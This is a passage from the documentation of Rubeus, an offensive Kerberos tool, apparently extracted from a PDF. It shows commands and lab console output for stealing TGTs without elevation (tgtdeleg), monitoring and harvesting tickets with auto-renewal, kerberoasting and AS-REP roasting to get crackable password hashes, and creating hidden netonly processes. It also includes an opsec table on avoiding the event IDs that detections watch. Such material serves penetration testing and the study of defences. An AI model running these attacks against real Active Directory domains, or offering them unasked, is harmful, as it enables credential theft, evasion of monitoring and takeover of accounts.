0NgsSyZ/XOCTi9wLR1z9Kg==\r\n KeyExpirationTime : 12/31/1600 4:00:00 PM\r\n TicketFlags : name_canonicalize, pre_authent, renewable, forwarded, forwardable\r\n StartTime : 2/11/2019 3:23:50 PM\r\n EndTime : 2/11/2019 7:23:48 PM\r\n RenewUntil : 2/18/2019 2:23:48 PM\r\n TimeSkew : 0\r\n EncodedTicketSize : 1304\r\n Base64EncodedTicket :\r\n doIFFDCCBRCgAwIBBaEDAgEWoo...(snip)...\r\n ...(snip)...\r\n[*] Enumerated 20 total tickets\r\n[*] Extracted 9 total tickets\r\ntgtdeleg\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 71 of 100\n\nThe tgtdeleg using @gentilkiwi's Kekeo trick (tgt::deleg) that abuses the Kerberos GSS-API to retrieve a usable\r\nTGT for the current user without needing elevation on the host. AcquireCredentialsHandle() is used to get a\r\nhandle to the current user's Kerberos security credentials, and InitializeSecurityContext() with the\r\nISC_REQ_DELEGATE flag and a target SPN of HOST/DC.domain.com to prepare a fake delegate context to\r\nsend to the DC. This results in an AP-REQ in the GSS-API output that contains a KRB_CRED in the authenticator\r\nchecksum. The service ticket session key is extracted from the local Kerberos cache and is used to decrypt the\r\nKRB_CRED in the authenticator, resulting in a usable TGT .kirbi.\r\nIf automatic target/domain extraction is failing, a known SPN of a service configured with unconstrained\r\ndelegation can be specified with /target:SPN .\r\nC:\\Rubeus\u003eRubeus.exe tgtdeleg\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Request Fake Delegation TGT (current user)\r\n[*] No target SPN specified, attempting to build 'HOST/dc.domain.com'\r\n[*] Initializing Kerberos GSS-API w/ fake delegation for target 'HOST/PRIMARY.testlab.local'\r\n[+] Kerberos GSS-API initialization success!\r\n[+] Delegation request success! AP-REQ delegation ticket is now in GSS-API output.\r\n[*] Found the AP-REQ delegation ticket in the GSS-API output.\r\n[*] Authenticator etype: aes256_cts_hmac_sha1\r\n[*] Extracted the service ticket session key from the ticket cache: YnEFxPfqw3LdfNvLtdFfzaFf7zG3hG+HNjesy+6R+ys=\r\n[+] Successfully decrypted the authenticator\r\n[*] base64(ticket.kirbi):\r\n doIFNjCCBTKgAwIBBaEDAgEWoo...(snip)...\r\nmonitor\r\nThe monitor action will periodically extract all TGTs every /monitorinterval:X seconds (default of 60) and\r\ndisplay any newly captured TGTs. A /targetuser:USER can be specified, returning only ticket data for said user.\r\nThis function is especially useful on servers with unconstrained delegation enabled ;)\r\nWhen the /targetuser:USER (or if not specified, any user) creates a new 4624 logon event, any extracted TGT\r\nKRB-CRED data is output.\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 72 of 100\n\nThe /nowrap flag causes the base64 encoded ticket output to no wrap per line.\r\nIf you want monitor to run for a specific period of time, use /runfor:SECONDS .\r\nFurther, if you wish to save the output to the registry, pass the /registry flag and specfiy a path under HKLM to\r\ncreate (e.g., /registry:SOFTWARE\\MONITOR ). Then you can remove this entry after you've finished running\r\nRubeus by Get-Item HKLM:\\SOFTWARE\\MONITOR\\ | Remove-Item -Recurse -Force .\r\nc:\\Rubeus\u003eRubeus.exe monitor /targetuser:DC$ /interval:10\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v1.5.0\r\n[*] Action: TGT Monitoring\r\n[*] Target user : DC$\r\n[*] Monitoring every 10 seconds for new TGTs\r\n[*] 12/21/2019 11:10:16 PM UTC - Found new TGT:\r\n User : DC$@THESHIRE.LOCAL\r\n StartTime : 12/21/2019 2:44:31 PM\r\n EndTime : 12/21/2019 3:44:31 PM\r\n RenewTill : 12/28/2019 2:13:06 PM\r\n Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable\r\n Base64EncodedTicket :\r\n doIFFDCCBRCgAwIBBaEDAgEWoo...(snip)...\r\n[*] Ticket cache size: 1\r\nNote that this action needs to be run from an elevated context!\r\nharvest\r\nThe harvest action takes monitor one step further. It periodically extract all TGTs every /monitorinterval:X\r\nseconds (default of 60), extracts any new TGT KRB-CRED files, and keeps a cache of any extracted TGTs. Every\r\ninterval, any TGTs that will expire before the next interval are automatically renewed (up until their renewal\r\nlimit). Every /displayinterval:X seconds (default of 1200) and the current cache of \"usable\"/valid TGT KRB-CRED .kirbis are output as base64 blobs.\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 73 of 100\n\nThis allows you to harvest usable TGTs from a system without opening up a read handle to LSASS, though\r\nelevated rights are needed to extract the tickets.\r\nThe /nowrap flag causes the base64 encoded ticket output to no wrap per line.\r\nIf you want harvest to run for a specific period of time, use /runfor:SECONDS .\r\nFurther, if you wish to save the output to the registry, pass the /registry flag and specfiy a path under HKLM to\r\ncreate (e.g., /registry:SOFTWARE\\MONITOR ). Then you can remove this entry after you've finished running\r\nRubeus by Get-Item HKLM:\\SOFTWARE\\MONITOR\\ | Remove-Item -Recurse -Force .\r\nc:\\Rubeus\u003eRubeus.exe harvest /interval:30\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v0.0.1a\r\n[*] Action: TGT Harvesting (w/ auto-renewal)\r\n[*] Monitoring every 30 minutes for 4624 logon events\r\n...(snip)...\r\n[*] Renewing TGT for dfm.a@TESTLAB.LOCAL\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 1520 bytes\r\n[*] Received 1549 bytes\r\n[*] 9/17/2018 6:43:02 AM - Current usable TGTs:\r\nUser : dfm.a@TESTLAB.LOCAL\r\nStartTime : 9/17/2018 6:43:02 AM\r\nEndTime : 9/17/2018 11:43:02 AM\r\nRenewTill : 9/24/2018 2:07:48 AM\r\nFlags : name_canonicalize, renewable, forwarded, forwardable\r\nBase64EncodedTicket :\r\n doIFujCCBbagAw...(snip)...\r\nNote that this action needs to be run from an elevated context!\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 74 of 100\n\nRoasting\r\nBreakdown of the roasting commands:\r\nCommand Description\r\nkerberoast Perform Kerberoasting against all (or specified) users\r\nasreproast Perform AS-REP roasting against all (or specified) users\r\nkerberoast\r\nThe kerberoast action replaces the SharpRoast project's functionality. Like SharpRoast, this action uses the\r\nKerberosRequestorSecurityToken.GetRequest Method() method that was contributed to PowerView by\r\n@machosec in order to request the proper service ticket (for default behavior, opsec table for more detail). Unlike\r\nSharpRoast, this action now performs proper ASN.1 parsing of the result structures.\r\nWith no other arguments, all user accounts with SPNs set in the current domain are Kerberoasted, requesting their\r\nhighest supported encryption type (see the opsec table). The /spn:X argument roasts just the specified SPN, the\r\n/user:X argument roasts just the specified user, and the /ou:X argument roasts just users in the specific OU.\r\nThe /domain and /dc arguments are optional, pulling system defaults as other actions do.\r\nThe /stats flag will output statistics about kerberoastable users found, including a breakdown of supported\r\nencryption types and years user passwords were last set. This flag can be combined with other targeting options.\r\nThe /outfile:FILE argument outputs roasted hashes to the specified file, one per line.\r\nIf the /simple flag is specified, roasted hashes will be output to the console, one per line.\r\nIf the /nowrap flag is specified, Kerberoast results will not be line-wrapped.\r\nIf the the TGT /ticket:X supplied (base64 encoding of a .kirbi file or the path to a .kirbi file on disk) that TGT\r\nis used to request the service service tickets during roasting. If /ticket:X is used with /spn:Y or /spns:Y\r\n( /spns: can be a file containing each SPN on a new line or a comma separated list) then no LDAP searching\r\nhappens for users, so it can be done from a non-domain joined system in conjunction with /dc:Z .\r\nIf the /tgtdeleg flag is supplied, the tgtdeleg trick it used to get a usable TGT for the current user, which is then\r\nused for the roasting requests. If this flag is used, accounts with AES enabled in msDS-SupportedEncryptionTypes will have RC4 tickets requested.\r\nIf the /aes flag is supplied, accounts with AES encryption enabled in msDS-SupportedEncryptionTypes are\r\nenumerated and AES service tickets are requested.\r\nIf the /ldapfilter:X argument is supplied, the supplied LDAP filter will be added to the final LDAP query used\r\nto find Kerberoastable users.\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 75 of 100\n\nIf the /rc4opsec flag is specified, the tgtdeleg trick is used, and accounts without AES enabled are enumerated\r\nand roasted.\r\nIf you want to use alternate domain credentials for Kerberoasting (and searching for users to Kerberoast), they can\r\nbe specified with /creduser:DOMAIN.FQDN\\USER /credpassword:PASSWORD .\r\nIf the /pwdsetafter:MM-dd-yyyy argument is supplied, only accounts whose password was last changed after\r\nMM-dd-yyyy will be enumerated and roasted.\r\nIf the /pwdsetbefore:MM-dd-yyyy argument is supplied, only accounts whose password was last changed before\r\nMM-dd-yyyy will be enumerated and roasted.\r\nIf the /resultlimit:NUMBER argument is specified, the number of accounts that will be enumerated and roasted is\r\nlimited to NUMBER.\r\nIf the /delay:MILLISECONDS argument is specified, that number of milliseconds is paused between TGS requests.\r\nThe /jitter:1-100 flag can be combined for a % jitter.\r\nIf the /enterprise flag is used, the spn is assumed to be an enterprise principal (i.e. user@domain.com). This\r\nflag only works when kerberoasting with a TGT.\r\nIf the /autoenterprise flag is used, if roasting an SPN fails (due to an invalid or duplicate SPN) Rubeus will\r\nautomatically retry using the enterprise principal. This is only useful when /spn or /spns is not supplied as\r\nRubeus needs to know the target accounts samaccountname, which it gets when querying LDAP for the account\r\ninformation.\r\nIf the /ldaps flag is used, any LDAP queries will go over TLS (port 636).\r\nIf the /nopreauth:USER argument is used, either the /spn:Y or /spns:Y argument is required. The\r\n/nopreauth:USER argument will attempt to send AS-REQ's with the service being those passed in /spn:Y or\r\n/spns:Y to request service tickets.\r\nkerberoasting opsec\r\nHere is a table comparing the behavior of various flags from an opsec perspective:\r\nArguments Description\r\nnone\r\nUse KerberosRequestorSecurityToken roasting method, roast w/ highest supported\r\nencryption\r\n/tgtdeleg\r\nUse the tgtdeleg trick to perform TGS-REQ requests of RC4-enabled accounts, roast\r\nall accounts w/ RC4 specified\r\n/ticket:X\r\nUse the supplied TGT blob/file for TGS-REQ requests, roast all accounts w/ RC4\r\nspecified\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 76 of 100\n\nArguments Description\r\n/rc4opsec\r\nUse the tgtdeleg trick, enumerate accounts without AES enabled, roast w/ RC4\r\nspecified\r\n/aes\r\nEnumerate accounts with AES enabled, use KerberosRequestorSecurityToken roasting\r\nmethod, roast w/ highest supported encryption\r\n/aes /tgtdeleg Use the tgtdeleg trick, enumerate accounts with AES enabled, roast w/ AES specified\r\n/pwdsetafter:X\r\nUse the supplied date and only enumerate accounts with password last changed after\r\nthat date\r\n/pwdsetbefore:X\r\nUse the supplied date and only enumerate accounts with password last changed before\r\nthat date\r\n/resultlimit:X Use the specified number to limit the accounts that will be roasted\r\n/nopreauth:USER\r\nWill send AS-REQ's rather than TGS-REQ's which results in 4768 events instead of the\r\n4769 frequently monitored for kerberoasting detections\r\nExamples\r\nKerberoasting all users in the current domain using the default KerberosRequestorSecurityToken.GetRequest\r\nmethod:\r\nC:\\Rubeus\u003eRubeus.exe kerberoast\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\n[*] Action: Kerberoasting\r\n[*] SamAccountName : harmj0y\r\n[*] DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local\r\n[*] ServicePrincipalName : asdf/asdfasdf\r\n[*] Hash : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$AE5F019D4CDED6CD74830CC...(snip)...\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 77 of 100\n\n[*] SamAccountName : sqlservice\r\n[*] DistinguishedName : CN=SQL,CN=Users,DC=testlab,DC=local\r\n[*] ServicePrincipalName : MSSQLSvc/SQL.testlab.local\r\n[*] Hash : $krb5tgs$23$*$testlab.local$MSSQLSvc/SQL.testlab.local*$E2B3869290...(snip)...\r\n...(snip)...\r\nKerberoasting all users in a specific OU, saving the hashes to an output file:\r\nC:\\Rubeus\u003eRubeus.exe kerberoast /ou:OU=TestingOU,DC=testlab,DC=local /outfile:C:\\Temp\\hashes.txt\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\n[*] Action: Kerberoasting\r\n[*] Target OU : OU=TestingOU,DC=testlab,DC=local\r\n[*] SamAccountName : testuser2\r\n[*] DistinguishedName : CN=testuser2,OU=TestingOU,DC=testlab,DC=local\r\n[*] ServicePrincipalName : service/host\r\n[*] Hash written to C:\\Temp\\hashes.txt\r\n[*] Roasted hashes written to : C:\\Temp\\hashes.txt\r\nPerform Kerberoasting using the tgtdeleg trick to get a usable TGT, requesting tickets only for accounts whose\r\npassword was last set between 01-31-2005 and 03-29-2010, returning up to 3 service tickets:\r\nC:\\Rubeus\u003eRubeus.exe kerberoast /tgtdeleg /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:3\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v1.5.0\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 78 of 100\n\n[*] Action: Kerberoasting\r\n[*] Using 'tgtdeleg' to request a TGT for the current user\r\n[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for everything else\r\n[*] Searching the current domain for Kerberoastable users\r\n[*] Searching for accounts with lastpwdset from 01-31-2005 to 03-29-2010\r\n[*] Up to 3 result(s) will be returned\r\n[*] Total kerberoastable users : 3\r\n[*] SamAccountName : harmj0y\r\n[*] DistinguishedName : CN=harmj0y,OU=TestOU,DC=theshire,DC=local\r\n[*] ServicePrincipalName : testspn/server\r\n[*] PwdLastSet : 5/31/2008 12:00:02 AM\r\n[*] Supported ETypes : AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96\r\n[*] Hash : $krb5tgs$23$*harmj0y$theshire.local$testspn/server*$F6EEFE5026CF8F02E3DC...(snip)..\r\n[*] SamAccountName : constraineduser\r\n[*] DistinguishedName : CN=constraineduser,CN=Users,DC=theshire,DC=local\r\n[*] ServicePrincipalName : blah/blah123\r\n[*] PwdLastSet : 9/5/2009 7:48:50 PM\r\n[*] Supported ETypes : RC4_HMAC\r\n[*] Hash : $krb5tgs$23$*constraineduser$theshire.local$blah/blah123*$6F0992C377AA12...(snip)..\r\n[*] SamAccountName : newuser\r\n[*] DistinguishedName : CN=newuser,CN=Users,DC=theshire,DC=local\r\n[*] ServicePrincipalName : blah/blah123456\r\n[*] PwdLastSet : 9/12/2008 8:05:16 PM\r\n[*] Supported ETypes : RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96\r\n[*] Hash : $krb5tgs$23$*newuser$theshire.local$blah/blah123456*$C4561559C2A7DF07712...(snip)..\r\nList statistics about found Kerberoastable accounts without actually sending ticket requests:\r\nC:\\Rubeus\u003eRubeus.exe kerberoast /stats\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 79 of 100\n\nv1.5.0\r\n[*] Action: Kerberoasting\r\n[*] Listing statistics about target users, no ticket requests being performed.\r\n[*] Searching the current domain for Kerberoastable users\r\n[*] Total kerberoastable users : 4\r\n ----------------------------------------------------------------------\r\n | Supported Encryption Type | Count |\r\n ----------------------------------------------------------------------\r\n | RC4_HMAC_DEFAULT | 1 |\r\n | RC4_HMAC | 1 |\r\n | AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96 | 1 |\r\n | RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96 | 1 |\r\n ----------------------------------------------------------------------\r\n ----------------------------------\r\n | Password Last Set Year | Count |\r\n ----------------------------------\r\n | 2019 | 4 |\r\n ----------------------------------\r\nKerberoasting a specific user, with simplified hash output:\r\nC:\\Rubeus\u003eRubeus.exe kerberoast /user:harmj0y /simple\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v1.5.0\r\n[*] Action: Kerberoasting\r\n[*] NOTICE: AES hashes will be returned for AES-enabled accounts.\r\n[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.\r\n[*] Target User : harmj0y\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 80 of 100\n\n[*] Searching the current domain for Kerberoastable users\r\n[*] Total kerberoastable users : 1\r\n$krb5tgs$18$*harmj0y$theshire.local$testspn/server*$F63783C58AA153F24DFCC796A120C55C$06C6929374A2D3...(snip)...\r\nKerberoasting all users in a foreign trusting domain, not line-wrapping the results:\r\nC:\\Rubeus\u003eRubeus.exe kerberoast /domain:dev.testlab.local /nowrap\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.5.0\r\n[*] Action: Kerberoasting\r\n[*] Target Domain : dev.testlab.local\r\n[*] SamAccountName : jason\r\n[*] DistinguishedName : CN=jason,CN=Users,DC=dev,DC=testlab,DC=local\r\n[*] ServicePrincipalName : test/test\r\n[*] Hash : $krb5tgs$23$*$dev.testlab.local$test/test@dev.testlab.local*$969339A82...(snip)...\r\nKerberoasting using an existing TGT:\r\nC:\\Rubeus\u003eRubeus.exe kerberoast /ticket:doIFujCCBbagAwIBBaEDAgEWoo...(snip)... /spn:\"asdf/asdfasdf\" /dc:primary\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.5\r\n[*] Action: Kerberoasting\r\n[*] Using a TGT /ticket to request service tickets\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 81 of 100\n\n[*] Target SPN : asdf/asdfasdf\r\n[*] Hash : $krb5tgs$23$*USER$DOMAIN$asdf/asdfasdf*$4EFF99FDED690AB4616EB...(snip)...\r\n\"Opsec\" Kerberoasting, using the tgtdeleg trick, filtering out AES-enabled accounts:\r\nC:\\Rubeus\u003eRubeus.exe kerberoast /rc4opsec\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.6\r\n[*] Action: Kerberoasting\r\n[*] Using 'tgtdeleg' to request a TGT for the current user\r\n[*] Searching the current domain for Kerberoastable users\r\n[*] Searching for accounts that only support RC4_HMAC, no AES\r\n[*] Found 6 users to Kerberoast!\r\n[*] SamAccountName : harmj0y\r\n[*] DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local\r\n[*] ServicePrincipalName : asdf/asdfasdf\r\n[*] Supported ETypes : RC4_HMAC_DEFAULT\r\n[*] Hash : $krb5tgs$23$*harmj0y$testlab.local$asdf/asdfasdf*$6B4AD4B61D37D54...(snip)...\r\nasreproast\r\nThe asreproast action replaces the ASREPRoast project which executed similar actions with the (larger sized)\r\nBouncyCastle library. If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be\r\nsuccessfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting. For\r\nmore technical information, see this post.\r\nJust as with the kerberoast command, if no other arguments are supplied, all user accounts not requiring with\r\nKerberos preauth not required are roasted. The /user:X argument roasts just the specified user, and the /ou:X\r\nargument roasts just users in the specific OU. The /domain and /dc arguments are optional, pulling system\r\ndefaults as other actions do.\r\nThe /outfile:FILE argument outputs roasted hashes to the specified file, one per line.\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 82 of 100\n\nAlso, if you wanted to use alternate domain credentials for kerberoasting, that can be specified with\r\n/creduser:DOMAIN.FQDN\\USER /credpassword:PASSWORD .\r\nThe output /format:X defaults to John the Ripper (Jumbo version). /format:hashcat is also an option for the\r\nnew hashcat mode 18200.\r\nIf the /ldaps flag is used, any LDAP queries will go over TLS (port 636).\r\nAS-REP roasting all users in the current domain:\r\nC:\\Rubeus\u003eRubeus.exe asreproast\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\n[*] Action: AS-REP roasting\r\n[*] Target Domain : testlab.local\r\n[*] SamAccountName : dfm.a\r\n[*] DistinguishedName : CN=dfm.a,CN=Users,DC=testlab,DC=local\r\n[*] Using domain controller: testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/o preauth) for: 'testlab.local\\dfm.a'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 163 bytes\r\n[*] Received 1537 bytes\r\n[+] AS-REQ w/o preauth successful!\r\n[*] AS-REP hash:\r\n $krb5asrep$dfm.a@testlab.local:D4A4BC281B200EE35CBF4A4537792D07$D655...(snip)...\r\n[*] SamAccountName : TestOU3user\r\n[*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local\r\n[*] Using domain controller: testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/o preauth) for: 'testlab.local\\TestOU3user'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 169 bytes\r\n[*] Received 1437 bytes\r\n[+] AS-REQ w/o preauth successful!\r\n[*] AS-REP hash:\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 83 of 100\n\n$krb5asrep$TestOU3user@testlab.local:DD6DF16B7E65223679CD703837C94FB...(snip)..\r\n[*] SamAccountName : harmj0y2\r\n[*] DistinguishedName : CN=harmj0y2,CN=Users,DC=testlab,DC=local\r\n[*] Using domain controller: testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/o preauth) for: 'testlab.local\\harmj0y2'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 166 bytes\r\n[*] Received 1407 bytes\r\n[+] AS-REQ w/o preauth successful!\r\n[*] AS-REP hash:\r\n $krb5asrep$harmj0y2@testlab.local:7D2E379A076BB804AF275ED51B86BF85$8...(snip)..\r\nAS-REP roasting all users in a specific OU, saving the hashes to an output file in Hashcat format:\r\nC:\\Rubeus\u003eRubeus.exe asreproast /ou:OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local /format:hashcat /outfi\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\n[*] Action: AS-REP roasting\r\n[*] Target OU : OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local\r\n[*] Target Domain : testlab.local\r\n[*] SamAccountName : TestOU3user\r\n[*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local\r\n[*] Using domain controller: testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/o preauth) for: 'testlab.local\\TestOU3user'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 169 bytes\r\n[*] Received 1437 bytes\r\n[+] AS-REQ w/o preauth successful!\r\n[*] Hash written to C:\\Temp\\hashes.txt\r\n[*] Roasted hashes written to : C:\\Temp\\hashes.txt\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 84 of 100\n\nAS-REP roasting a specific user:\r\nC:\\Rubeus\u003eRubeus.exe asreproast /user:TestOU3user\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\n[*] Action: AS-REP roasting\r\n[*] Target User : TestOU3user\r\n[*] Target Domain : testlab.local\r\n[*] SamAccountName : TestOU3user\r\n[*] DistinguishedName : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local\r\n[*] Using domain controller: testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/o preauth) for: 'testlab.local\\TestOU3user'\r\n[*] Connecting to 192.168.52.100:88\r\n[*] Sent 169 bytes\r\n[*] Received 1437 bytes\r\n[+] AS-REQ w/o preauth successful!\r\n[*] AS-REP hash:\r\n $krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)...\r\nAS-REP roasting all users in a foreign trusting domain:\r\nC:\\Rubeus\u003eRubeus.exe asreproast /domain:dev.testlab.local\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\n[*] Action: AS-REP roasting\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 85 of 100\n\n[*] Target Domain : dev.testlab.local\r\n[*] SamAccountName : devuser3\r\n[*] DistinguishedName : CN=devuser3,CN=Users,DC=dev,DC=testlab,DC=local\r\n[*] Using domain controller: dev.testlab.local (192.168.52.105)\r\n[*] Building AS-REQ (w/o preauth) for: 'dev.testlab.local\\devuser3'\r\n[*] Connecting to 192.168.52.105:88\r\n[*] Sent 175 bytes\r\n[*] Received 1448 bytes\r\n[+] AS-REQ w/o preauth successful!\r\n[*] AS-REP hash:\r\n $krb5asrep$devuser3@dev.testlab.local:650B881E44B92FB6A378DD21E8B020...(snip)...\r\nAS-REP roasting users in a foreign non-trusting domain using alternate credentials:\r\nC:\\Rubeus\u003eRubeus.exe asreproast /domain:external.local /creduser:\"EXTERNAL.local\\administrator\" /credpassword:\"\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.4\r\n[*] Action: AS-REP roasting\r\n[*] Target Domain : external.local\r\n[*] Using alternate creds : EXTERNAL.local\\administrator\r\n[*] SamAccountName : david\r\n[*] DistinguishedName : CN=david,CN=Users,DC=external,DC=local\r\n[*] Using domain controller: external.local (192.168.52.95)\r\n[*] Building AS-REQ (w/o preauth) for: 'external.local\\david'\r\n[*] Connecting to 192.168.52.95:88\r\n[*] Sent 165 bytes\r\n[*] Received 1376 bytes\r\n[+] AS-REQ w/o preauth successful!\r\n[*] AS-REP hash:\r\n $krb5asrep$david@external.local:9F5A33465C53056F17FEFDF09B7D36DD$47DBAC3...(snip)...\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 86 of 100\n\nMiscellaneous\r\nBreakdown of the miscellaneous commands:\r\nCommand Description\r\ncreatenetonly Create a process of logon type 9\r\nchangepw Perform the Aorato Kerberos password reset\r\nhash Hash a plaintext password to Kerberos encryption keys\r\ntgssub Substitute in alternate service names into a service ticket\r\ncurrentluid Display the current user's LUID\r\nlogonsession Display logon session information\r\nasrep2kirbi Convert an AS-REP and a client key to a Kirbi (KERB_CRED)\r\nkirbi Manipulate Kirbi's (KERB_CRED)\r\ncreatenetonly\r\nThe createnetonly action will use the CreateProcessWithLogonW() API to create a new hidden (unless /show is\r\nspecified) process with a SECURITY_LOGON_TYPE of 9 (NewCredentials), the equivalent of runas /netonly.\r\nThe process ID and LUID (logon session ID) are returned. This process can then be used to apply specific\r\nKerberos tickets to with the ptt /luid:0xA.. parameter, assuming elevation. This prevents the erasure of existing\r\nTGTs for the current logon session.\r\nCreate a hidden upnpcont.exe process:\r\nC:\\Rubeus\u003eRubeus.exe createnetonly /program:\"C:\\Windows\\System32\\upnpcont.exe\"\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.3.3\r\n[*] Action: Create Process (/netonly)\r\n[*] Showing process : False\r\n[+] Process : 'C:\\Windows\\System32\\upnpcont.exe' successfully created with LOGON_TYPE = 9\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 87 of 100\n\n[+] ProcessID : 9936\r\n[+] LUID : 0x4a0717f\r\nCreate a visible command 